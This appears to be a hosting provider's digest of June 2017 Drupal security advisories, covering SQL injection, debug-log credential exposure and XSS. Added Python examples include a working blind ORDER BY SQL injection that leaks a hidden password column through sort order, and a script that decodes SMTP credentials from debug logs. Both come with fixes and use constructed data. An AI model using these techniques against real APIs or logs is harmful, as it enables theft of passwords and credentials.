June 2017

Services - Critical - SQL Injection

* Advisory ID: DRUPAL-SA-CONTRIB-2017-054
* Project: Services (third-party module)
* Version: 7.x
* Date: 2017-June-28
* Security risk: 19/25 (Critical)
* Vulnerability: SQL Injection

DESCRIPTION

This module provides a standardized solution for building APIs so that
external clients can communicate with Drupal.

The module does not sufficiently sanitize column names supplied by the client
when it queries for data and sorts the results, so a client can place arbitrary
SQL in the ORDER BY clause.
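The following is an added example and not code from the Services module: a hypothetical API handler that concatenates a client-supplied sort column into ORDER BY (column names are identifiers and cannot be bound as parameters, which is why this pattern shows up so often), followed by the attacker's side. The server only ever returns uid and name, yet because the sort expression controls the row order, one bit per request leaks, and a column the API never exposes can be read out character by character. The hardened variant maps the request parameter onto an allowlist before any SQL is built. The table, rows and secrets are constructed for the demonstration; it uses SQLite so it runs offline.

```python
import sqlite3

# Constructed sample data (not from the Services module): the API exposes uid
# and name, but the table also holds a column the client must never see.
SAMPLE_ROWS = [
    (1, "alice", "s3cretA"),
    (2, "bob", "s3cretB"),
    (3, "carol", "s3cretC"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uid INTEGER, name TEXT, pass TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def list_users_vulnerable(conn, sort):
    """Hypothetical vulnerable handler: the client-supplied sort column lands
    in the identifier position by string concatenation."""
    sql = "SELECT uid, name FROM users ORDER BY " + sort
    return [name for _, name in conn.execute(sql)]


def sort_oracle(conn, condition):
    """Attacker side: make the row order depend on an arbitrary SQL condition.
    Ascending uid order means the condition was true, descending means false."""
    payload = "(CASE WHEN (" + condition + ") THEN uid ELSE -uid END)"
    return list_users_vulnerable(conn, payload) == ["alice", "bob", "carol"]


def leak_secret(conn, uid,
                charset="abcdefghijklmnopqrstuvwxyz"
                        "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"):
    """Recover users.pass for one uid, one character at a time, using only
    the order in which the API returns uid/name rows."""
    found = ""
    while True:
        for ch in charset:
            cand = found + ch
            cond = ("substr((SELECT pass FROM users WHERE uid = %d), 1, %d) = '%s'"
                    % (uid, len(cand), cand))
            if sort_oracle(conn, cond):
                found = cand
                break
        else:
            return found  # no character extends the prefix: value is complete


# Hardened handler: the request parameter selects from a fixed allowlist of
# column names and directions; anything else is rejected before SQL is built.
SORTABLE_COLUMNS = {"uid": "uid", "name": "name"}
SORT_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def list_users_hardened(conn, sort, direction="asc"):
    column = SORTABLE_COLUMNS.get(sort)
    order = SORT_DIRECTIONS.get(str(direction).lower())
    if column is None or order is None:
        raise ValueError("unsupported sort parameter")
    sql = "SELECT uid, name FROM users ORDER BY %s %s" % (column, order)
    return [name for _, name in conn.execute(sql)]


if __name__ == "__main__":
    db = make_db()
    print("leaked via sort order:", leak_secret(db, 1))
    print("hardened, name desc:", list_users_hardened(db, "name", "desc"))
    try:
        list_users_hardened(db, "(CASE WHEN 1 THEN uid ELSE -uid END)")
    except ValueError as exc:
        print("hardened rejects payload:", exc)
```

The point of the oracle is that escaping the sort value as a string does not help: the value is used as an identifier or expression, not as a string literal, so the only sound fix is to never let client input reach that position and to translate it through an allowlist instead.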

SMTP - Moderately Critical - Information Disclosure

* Advisory ID: DRUPAL-SA-CONTRIB-2017-055
* Project: SMTP Authentication Support (third-party module)
* Version: 7.x, 8.x
* Date: 2017-June-28
* Security risk: 10/25 (Moderately Critical)
* Vulnerability: Information Disclosure

DESCRIPTION

The SMTP module lets Drupal send mail through a third-party (non-system) mail
service instead of the local system mailer included with Drupal. When the module
is in debugging mode, it logs privileged information.
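The advisory does not say which privileged information the debug mode logs. The following is an added example, not code from the SMTP module, and assumes the usual case for mail-library debug output: the SMTP conversation, including the AUTH exchange, is written to the log. It shows why a plain search of the log for the password string finds nothing (SMTP credentials travel base64-encoded, for both AUTH PLAIN and AUTH LOGIN), recovers the credentials that anyone with read access to the log could recover, and produces a redacted copy. The transcript, hostnames and credentials are constructed.

```python
import base64
import binascii
import re

# Constructed fake credentials for the sample transcript (not real ones).
FAKE_USER = "drupal@example.test"
FAKE_PASS = "hunter2"


def b64(text):
    return base64.b64encode(text.encode()).decode()


SERVER_PREFIX = "SERVER -> CLIENT: "
CLIENT_PREFIX = "CLIENT -> SERVER: "

# Constructed debug transcript in the style a mail library prints with its
# debug flag on; not output from the SMTP module itself. Shows both mechanisms.
SAMPLE_TRANSCRIPT = "\n".join([
    SERVER_PREFIX + "220 mail.example.test ESMTP",
    CLIENT_PREFIX + "EHLO drupal.example.test",
    SERVER_PREFIX + "250-AUTH PLAIN LOGIN",
    CLIENT_PREFIX + "AUTH PLAIN " + b64("\0" + FAKE_USER + "\0" + FAKE_PASS),
    SERVER_PREFIX + "235 2.7.0 Authentication successful",
    CLIENT_PREFIX + "AUTH LOGIN",
    SERVER_PREFIX + "334 " + b64("Username:"),
    CLIENT_PREFIX + b64(FAKE_USER),
    SERVER_PREFIX + "334 " + b64("Password:"),
    CLIENT_PREFIX + b64(FAKE_PASS),
    SERVER_PREFIX + "235 2.7.0 Authentication successful",
    CLIENT_PREFIX + "MAIL FROM:<noreply@example.test>",
])

BARE_B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def decode_b64(blob):
    """Decode a base64 token, or return None if it is not valid base64."""
    try:
        return base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None


def parse_plain(raw):
    """AUTH PLAIN payload is authzid NUL authcid NUL password."""
    parts = raw.split(b"\0")
    if len(parts) == 3:
        return (parts[1].decode("utf-8", "replace"),
                parts[2].decode("utf-8", "replace"))
    return None


def scan_transcript(transcript):
    """Single pass over the transcript. Returns (redacted_text, credentials),
    where credentials is the list of (username, password) pairs recoverable
    from the log. Server 334 replies drive the AUTH LOGIN state machine."""
    out, creds = [], []
    pending, user = None, None  # pending: None, "plain", "user" or "pass"
    for line in transcript.splitlines():
        if not line.startswith(CLIENT_PREFIX):
            out.append(line)
            if line.startswith(SERVER_PREFIX) and \
                    not line[len(SERVER_PREFIX):].startswith("334"):
                pending = None  # only a 334 invites another base64 response
            continue
        body = line[len(CLIENT_PREFIX):].strip()
        words = body.split()
        if len(words) >= 2 and words[0].upper() == "AUTH":
            mech, initial = words[1].upper(), (words[2] if len(words) > 2 else None)
            raw = decode_b64(initial) if initial else None
            if mech == "PLAIN":
                cred = parse_plain(raw) if raw else None
                if cred:
                    creds.append(cred)
                pending = "plain" if initial is None else None
            elif mech == "LOGIN":
                if initial is None:
                    pending = "user"
                else:  # username sent as initial response
                    user, pending = (raw or b"").decode("utf-8", "replace"), "pass"
            out.append(CLIENT_PREFIX + " ".join(words[:2]) +
                       (" [REDACTED]" if initial else ""))
            continue
        if pending and BARE_B64_RE.match(body):
            raw = decode_b64(body)
            text = raw.decode("utf-8", "replace") if raw is not None else ""
            if pending == "plain":
                cred = parse_plain(raw) if raw else None
                if cred:
                    creds.append(cred)
                pending = None
            elif pending == "user":
                user, pending = text, "pass"
            else:
                creds.append((user, text))
                user, pending = None, None
            out.append(CLIENT_PREFIX + "[REDACTED]")
            continue
        out.append(line)
    return "\n".join(out), creds


if __name__ == "__main__":
    redacted, found = scan_transcript(SAMPLE_TRANSCRIPT)
    print("recoverable credentials:", found)
    print(redacted)
```

Run against a site's stored log output (for Drupal, the watchdog/dblog table or syslog) after debug mode has been on; any credential the scanner recovers should be treated as exposed and rotated, and debug mode should be off in production regardless of what the fix release changes.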

Drupal Core - Multiple Vulnerabilities - SA-CORE-2017-003

Drupal 8.3.4 and Drupal 7.56 are maintenance releases that contain fixes for security vulnerabilities.

Please note that Drupal 8 and 7 core and core modules on all websites hosted on the Drupion platform are updated automatically unless a customer has specifically requested otherwise. If you are a Drupion customer, no action is required on your part for this advisory. If, however, you asked us not to update Drupal 8 or 7 core on your Drupion server, please read on.

Search 404 - Moderately Critical - Cross Site Scripting

* Advisory ID: DRUPAL-SA-CONTRIB-2017-053
* Project: Search 404 (third-party module)
* Version: 7.x
* Date: 2017-June-21
* Security risk: 13/25 (Moderately Critical)
* Vulnerability: Cross Site Scripting

DESCRIPTION

The Search 404 module redirects 404 pages to a search page on the site, using
the keywords from the URL that was not found as the search terms.

The module did not filter administrator-provided text before displaying it to
the user on the 404 page, creating a Cross Site Scripting (XSS) vulnerability.